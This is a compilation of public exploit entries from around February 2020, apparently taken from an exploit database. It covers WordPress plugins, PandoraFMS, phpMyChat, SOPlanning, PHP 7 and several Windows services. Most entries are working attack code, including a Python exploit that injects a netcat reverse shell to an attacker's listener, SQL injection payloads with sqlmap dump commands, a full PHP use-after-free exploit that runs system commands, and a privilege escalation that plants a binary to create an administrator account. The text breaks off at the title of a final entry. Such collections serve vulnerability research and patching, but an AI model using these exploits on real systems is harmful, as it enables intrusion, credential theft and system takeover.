# Title: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/wordfence/ ============================================================================== Vulnerable Source: 5662: readfile readfile($localFile); 5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file'])); ================================================================================= Exploit: localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD] =================================================================================
PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution # Date: 2020-02-12 # Exploit Author: Engin Demirbilek # Vendor homepage: http://pandorafms.org/ # Version: 7.0 # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Tested on: CentOS # CVE: CVE-2020-8947 #!/bin/python ''' PANDORAFMS 7.0 Authenticated Remote Code Execution x4 This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS. incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port Author: Engin Demirbilek Github: github.com/EnginDemirbilek CVE: CVE-2020-8947 ''' import requests import sys if len(sys.argv) < 6: print "Usage: ./exploit.py http://url username password listenerIP listenerPort" exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#' login = { 'nick':user, 'pass':password, 'login_button':'Login' } req = requests.Session() print "Sendin login request ..." login = req.post(url+"/pandora_console/index.php?login=1", data=login) payload = { 'date':"", 'time':"", 'period':"", 'interval_length':"", 'chart_type':"", 'max_aggregates':"1", 'address_resolution':"0", 'name':"", 'assign_group':"0", 'filter_type':"0", 'filter_id':"0", 'filter_selected':"0", 'ip_dst':payload, 'ip_src':"", 'dst_port':"", 'src_port':"", 'advanced_filter':"", 'aggregate':"dstip", 'router_ip':"", 'output':"bytes", 'draw_button':"Draw" } print "[+] Sendin exploit ..." 
exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={ 'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded'}) if exploit.status_code == 200: print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port." else: print "[-] Couldn't send the HTTP request, try again."
WordPress Plugin contact-form-7 5.1.6 - Remote File Upload
# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload # Author: mehran feizi # Category: webapps # Date: 2020-02-11 # vendor home page: https://wordpress.org/plugins/contact-form-7/ Vulnerable Source: 134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file)) 82: $file = $_FILES[$name] : null; 132: $new_file = path_join($uploads_dir, $filename); 122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 121: $uploads_dir = wpcf7_upload_tmp_dir(); 131: $filename = wp_unique_filename($uploads_dir, $filename); 122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 121: $uploads_dir = wpcf7_upload_tmp_dir(); 128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); 126: $filename = wpcf7_antiscript_file_name ($filename); 125: $filename = wpcf7_canonicalize ($filename, 'as-is'); 124: $filename = $file['name']; 82: $file = $_FILES[$name] : null; 82: $file = $_FILES[$name] : null; 78: ⇓ function wpcf7_file_validation_filter($result, $tag) Exploit: <?php $shahab="file.jpg"; $ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$shahab")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location File: http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg
-
WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion # Author : mehran feizi # Vendor : https://wordpress.org/plugins/ultimate-member/ # Category : Webapps # Date : 2020-02-11 # Vendor home page: https://wordpress.org/plugins/ultimate-member/ Vulnerable Page: /class-admin-upgrade.php Vulnerable Source: 354: if(empty($_POST['pack'])) else 356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php'; Exploit: localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php $_POST('pack')=<script>alert('xss')</script>
-
phpMyChat Plus 1.98 - 'pmc_username' SQL Injection
# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection # Date: 2020-02-13 # Exploit Author: J3rryBl4nks # Vendor Homepage: http://ciprianmp.com/latest/ # Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/ # Version: phpMyChat Plus 1.98 # Tested on Windows 10/Kali Rolling # The phpMyChat Plus 1.98 application is vulnerable to SQL Injection # (Boolean-based blind, Error-based, Time-based blind) on the deluser.php page # through the pmc_username parameter. # POC code: # Capture the request through Burpsuite: POST /plus/deluser.php HTTP/1.1 Host: HOSTNAME User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://HOSTNAME/plus/deluser.php Content-Type: application/x-www-form-urlencoded Content-Length: 77 Connection: close Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9 Upgrade-Insecure-Requests: 1 L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In # Then use sqlmap to get the user tables: sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username Parameter: pmc_username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In
-
HomeGuard Pro 9.3.1 - Insecure Folder Permissions
# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions # Exploit Author: boku # Date: 2020-02-13 # Vendor Homepage: https://veridium.net # Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe # Version 9.3.1 # Tested On: Windows 10 (32-bit) # HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions ## Service Information (Unquoted Service Path) C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """ Name PathName StartMode StartName HG52 AM VI C:\Program Files\HomeGuard Pro\vglset.exe Auto LocalSystem HG52 AMC C:\Program Files\HomeGuard Pro\vglsetw.exe Auto LocalSystem HG52 AM REM C:\Program Files\HomeGuard Pro\vglrem.exe Auto LocalSystem HG52 AM SRV C:\Program Files\HomeGuard Pro\vglserv.exe Auto LocalSystem ## Insecure Folder Permission C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users" C:\Program Files\HomeGuard Pro BUILTIN\Users:(F) ## Insecure File/Service Permission C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users" C:\Program Files\HomeGuard Pro\vglrem.exe BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\vglsetw.exe BUILTIN\Users:(I)(F)
-
EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path
# Exploit Title: EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-02-13 # Vendor Homepage: https://epson.com/support/easymp-network-projection-v2-86-for-windows # Software Link :https://ftp.epson.com/drivers/epson16189.exe # SEIKO EPSON CORP # Tested Version: 2.81 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 en # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON" | findstr /i /v """ EMP_NSWLSV EMP_NSWLSV C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe Auto C:\>sc qc "EMP_NSWLSV" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EMP_NSWLSV TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : EMP_NSWLSV DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.
-
SprintWork 2.3.1 - Local Privilege Escalation
# Exploit Title: SprintWork 2.3.1 - Local Privilege Escalation # Exploit Author: boku # Date: 2020-02-13 # Vendor Homepage: https://veridium.net # Software Link: https://veridium.net/files_u/spx/exe/SprintWork-Setup.exe # Version: 2.3.1 # Tested On: Windows 10 (32-bit) # Vulnerability Overview: # SprintWork v2.3.1 (x86) suffers from insecure file, service and folder permissions, unquoted service paths, # and a missing executable for one of the two Services it installs, both of which run as 'LocalSystem'. # This allows any local user to gain persistent code-execution as 'LocalSystem'. # Both the 32bit & 64bit build of SprintWork v2.3.1 create the services 'SP52 AMC' & 'SprintWork TM VI', with the "StartMode" set to 'Auto', to be run as 'LocalSystem'; these services will run every time the computer starts. The 'SP52 AMC' Service is set to use the 'nvlsimw.exe' file. On the 32bit version, the 'nvlsimw.exe' file is never created. This, in combination with its other vulnerabilities, results in persistent code-execution for any local user as 'LocalSystem'. # See Proof of Concept below for full details. # About: # "SprintWork Distraction Blocker -- Block Social Networks and Games, Track Time Spent on Websites and Programs, Maximize Productivity # + Block or time restrict social networks, online games or any website # - Block web distractions including social media, addictive gaming websites, video streaming websites or any website wasting your time. # + Block or time restrict games and programs # - Usage of non-work related applications can be blocked or limited to certain times of day, days of week or restricted to a total amount of time per day. # + Detailed activity monitoring and reporting # - Records time spent actively using programs, total run time of each program and start and end times of usage sessions as well as details of visited websites including time and total duration of visits. # + Selective user monitoring and blocking. 
# - Can exclude certain computer users from blocking rules and monitoring of activity. Useful for shared and family computers. # + Wildcard support # - Block websites that have certain words in their addresses or block an entire domain or only a specific sub-domain. # + Multiple website blocking lists. # - Block or set time restrictions collectively for groups of websites. # + Cannot be bypassed, deleted or disabled. # - Works with all browsers and Internet clients and cannot be forcefully stopped, disabled or uninstalled unless the lock time you've chosen expires and only after you enter your password." # - https://veridium.net/sprintwork/ ## Service Information (there is also an Unquoted Service Path) C:\>wmic service get name,pathname,startmode,StartName | findstr /v "C:\Windows" | findstr /i /c:Sprintwork SP52 AMC C:\Program Files\SprintWork\nvlsimw.exe Auto LocalSystem SprintWork TM VI C:\Program Files\SprintWork\nvlsim.exe Auto LocalSystem ## Missing Executable file 'nvlsimw.exe' for the 'SP52 AMC' service C:\>dir "C:\Program Files\SprintWork\" | findstr /i /c:"exe" 11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE 12/25/2019 02:47 PM 1,202,688 qcden.exe 12/25/2019 02:47 PM 14,436,864 SprintWork.exe 11/23/2019 10:20 PM 1,557,504 txew.exe ## Insecure Folder Permission C:\>icacls "C:\Program Files\SprintWork" C:\Program Files\SprintWork BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) ## Insecure File/Service Permission C:\>icacls "C:\Program Files\SprintWork\NVLSIM.EXE" C:\Program Files\SprintWork\NVLSIM.EXE BUILTIN\Users:(I)(F) ## Local Privilege Escalation Proof of Concept #0. Download & install SprintWork v2.3.1 (x86) on Windows 10 32bit Operating System #1. Create low privileged user C:\Windows\system32>net user lowpriv password /add #2. 
Change to lowpriv User C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full" User name lowPrivUser Local Group Memberships *Users Global Group memberships *None C:\>whoami mycomputer\lowprivuser #3. Create malicious binary on Kali Linux 3.1) Download dependencies root@kali# apt install gcc-mingw-w64-i686 wine64 -y 3.2) Create Add Admin User C Code root@kali# cat addAdmin.c #include<windows.h> int main(void){ system("net user adminpriv mypassword /add"); system("net localgroup Administrators adminpriv /add"); return 0; } 3.3) Compile Code root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o nvlsimw.exe #4. Transfer created 'nvlsimw.exe' to the Windows Host #5. Move the created 'nvlsimw.exe' binary to the 'C:\Program Files\SprintWorks\' Directory C:\Users\lowpriv>move nvlsimw.exe "C:\Program Files\SprintWork\" 1 file(s) moved. C:\Users\lowpriv>dir "C:\Program Files\SprintWork\" | findstr /i /c:nvlsim 11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE 02/13/2020 06:07 PM 288,469 nvlsimw.exe #6. Verify localgroup 'Administrators' members C:\Users\lowpriv>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator boku #6. Reboot the Computer C:\Users\lowpriv>shutdown /r /t 0 #7. 
Verify user 'adminpriv' was created & added to the localgroup 'Administrators' C:\>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator adminpriv boku C:\>net user adminpriv | findstr /C:"User name" /C:active /C:Password /C:Group User name adminpriv Account active Yes Password last set ?2/?13/?2020 6:18:03 PM Password expires Never Password changeable ?2/?13/?2020 6:18:03 PM Password required Yes Local Group Memberships *Administrators *Users Global Group memberships *None
-
Microsoft Windows Kernel - Information Disclosure
# PoC for the SWAPGS attack ([CVE-2019-1125](https://nvd.nist.gov/vuln/detail/CVE-2019-1125)) This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA, 2019. ## Contents * leakgsbkva - variant 1 (look for random values in kernel memory; limited to PE kernel image header) * leakgsbkvat - variant 2 (extract random values from kernel memory; limited to PE kernel image header) * whitepaper * Black Hat USA 2019 presentation ## Prerequisites 1. Visual Studio 2015 2. Unpatched Windows x64 (7 or newer) ## Authors * Andrei Vlad LUȚAȘ * Dan Horea LUȚAȘ ## Additional resources [Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE) Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48071.zip
-
PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass
<?php # PHP 7.0-7.4 disable_functions bypass PoC (*nix only) # # Bug: https://bugs.php.net/bug.php?id=76047 # debug_backtrace() returns a reference to a variable # that has been destroyed, causing a UAF vulnerability. # # This exploit should work on all PHP 7.0-7.4 versions # released as of 30/01/2020. # # Author: https://github.com/mm0r1 pwn("uname -a"); function pwn($cmd) { global $abc, $helper, $backtrace; class Vuln { public $a; public function __destruct() { global $backtrace; unset($this->a); $backtrace = (new Exception)->getTrace(); # ;) if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 $backtrace = debug_backtrace(); } } } class Helper { public $a, $b, $c, $d; } function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = chr($v & 0xff); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? 
$p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } function trigger_uaf($arg) { # str_shuffle prevents opcache string interning $arg = str_shuffle(str_repeat('A', 79)); $vuln = new Vuln(); $vuln->a = $arg; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if UAF fails $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_shuffle(str_repeat('A', 79)); trigger_uaf('x'); $abc = $backtrace[1]['args'][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value 
write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit(); }
-
SOPlanning 1.45 - 'by' SQL Injection
# Exploit Title: SOPlanning 1.45 - 'by' SQL Injection # Date: 2020-02-14 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ # Version 1.45 # Tested on Windows 10/Kali Rolling # The SOPlanning application is vulnerable to SQL Injection in the OrderBy clause of the sort on the Projects page: # POC: # The SOPlanning 1.45 application is vulnerable to SQL Injection which can be leveraged into getting the information for the users table. # Capture the request in Burpsuite: GET /soplanning/www/projets.php?order=nom_createur&by=ASC HTTP/1.1 Host: HOSTNAME User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://HOST/soplanning/www/projets.php?order=charge&by=ASC Connection: close Cookie: xposMois=0; dateDebut=14/02/2020; dateFin=14/04/2020; xposMoisWin=0; xposJoursWin=0; xposJours=0; yposMoisWin=0; yposMois=0; yposJoursWin=0; yposJours=0; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9; soplanningplanning_=pnljrmetd5cse4d8dm1f09fn0u; baseLigne=users; baseColonne=jours; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%5D Upgrade-Insecure-Requests: 1 # Feed the request into SQLMap: sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump Then you will be able to see the information for the users in the database: root@kali:~/SOPlanning# sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump ___ __H__ ___ ___[(]_____ ___ ___ {1.4.1.2#dev} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:13:27 /2020-02-14/ [11:13:27] [INFO] parsing HTTP request from 'projects.req' [11:13:27] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: by (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END)) Type: time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1) --- Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes.
-
HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-02-14 # Vendor Homepage:https://www8.hp.com/mx/es/home.html # Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe # HP Development Company, L.P. # Tested Version: 1.2.9.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 en # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """ HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto C:\>sc qc HPWMISVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HPWMISVC TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HPWMISVC DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> # Exploit: # A successful attempt would require the local user to be able to insert their code in the system # root path undetected by the OS or other security applications where it could potentially be # executed during application startup or reboot. If successful, the local user's code would # execute with the elevated privileges of the application.
-
WordPress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting # Date: 2020-01-23 # Vendor Homepage: https://strongtestimonials.com # Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 2.40.0 and below # CVE : CVE-2020-8549 # 1. Description # Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with # over 90,000 active installations. In the client details section, which is shown when adding # or editing a testimonial, the custom[client_name] and custom[company_name] parameters # were found to be vulnerable to stored cross-site scripting. All WordPress websites # using Strong Testimonials version 2.40.0 and below are affected. 2. Proof of Concept When the testimonial is added to a page on the site, the XSS payload passed in both of the above-mentioned vulnerable parameters gets executed. The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page. 
POST /wp-admin/post.php HTTP/1.1 Host: testing.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 1402 Origin: http://testing.com Connection: close Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg Upgrade-Insecure-Requests: 1 
_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator 3. Timeline Vulnerability reported to the Strong Testimonials team – January 23, 2020 Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020
-
Avaya Aura Communication Manager 5.2 - Remote Code Execution
